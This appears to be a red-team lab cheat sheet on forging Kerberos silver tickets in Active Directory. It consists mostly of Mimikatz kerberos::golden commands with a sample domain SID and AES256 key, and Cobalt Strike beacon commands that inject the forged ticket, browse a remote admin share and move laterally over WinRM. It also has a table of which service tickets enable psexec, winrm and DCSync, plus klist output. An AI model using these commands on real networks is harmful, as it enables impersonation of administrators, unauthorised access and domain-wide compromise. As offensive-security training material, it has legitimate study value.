Silver Ticket

mimikatz # kerberos::golden /user:Administrator /domain:dev.cyberbotic.io /sid:S-1-5-21-3263068140-2042698922-2891547269 /target:srv-2 /service:cifs /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05 /ticket:srv2-cifs.kirbi

# OR
kerberos::golden /user:<> /domain:<> /sid:<> /target:<> /service:<> /rc4:<> /ticket:silver.kirbi /ptt 

Where:

• /user is the username to impersonate. (any user)

• /domain is the current FQDN domain name.

• /sid is the current domain SID.

• /target is the FQDN target machine.

• /service is the target service

• /rc4 is the NTLM hash of the computer account

• /aes256 is the AES256 key for the target machine.

• /ticket is the filename to save the ticket as.

beacon> make_token DEV\Administrator FakePass
[+] Impersonated DEV\bfarmer

beacon> kerberos_ticket_use C:\Users\Administrator\Desktop\srv2-cifs.kirbi
beacon> ls \\srv-2\c$

beacon> rev2self

Technique	Required Service Tickets
psexec	CIFS
winrm	HOST & HTTP
dcsync (DCs only)	LDAP

beacon> run klist

Current LogonId is 0:0x2d3d7

Cached Tickets: (2)

#0>    Client: Administrator @ dev.cyberbotic.io
    Server: host/srv-2 @ dev.cyberbotic.io
    KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
    Ticket Flags 0x40a00000 -> forwardable renewable pre_authent 
    Start Time: 5/26/2021 17:04:19 (local)
    End Time:   5/24/2031 17:04:19 (local)
    Renew Time: 5/24/2031 17:04:19 (local)
    Session Key Type: AES-256-CTS-HMAC-SHA1-96
    Cache Flags: 0 
    Kdc Called: 

#1>    Client: Administrator @ dev.cyberbotic.io
    Server: http/srv-2 @ dev.cyberbotic.io
    KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
    Ticket Flags 0x40a00000 -> forwardable renewable pre_authent 
    Start Time: 5/26/2021 17:06:34 (local)
    End Time:   5/24/2031 17:06:34 (local)
    Renew Time: 5/24/2031 17:06:34 (local)
    Session Key Type: AES-256-CTS-HMAC-SHA1-96
    Cache Flags: 0 
    Kdc Called: 

beacon> jump winrm64 srv-2 smb
[+] established link to child beacon: 10.10.17.68

Note: we can use the target machine hash as the service hash for the filesharing service (CIFS).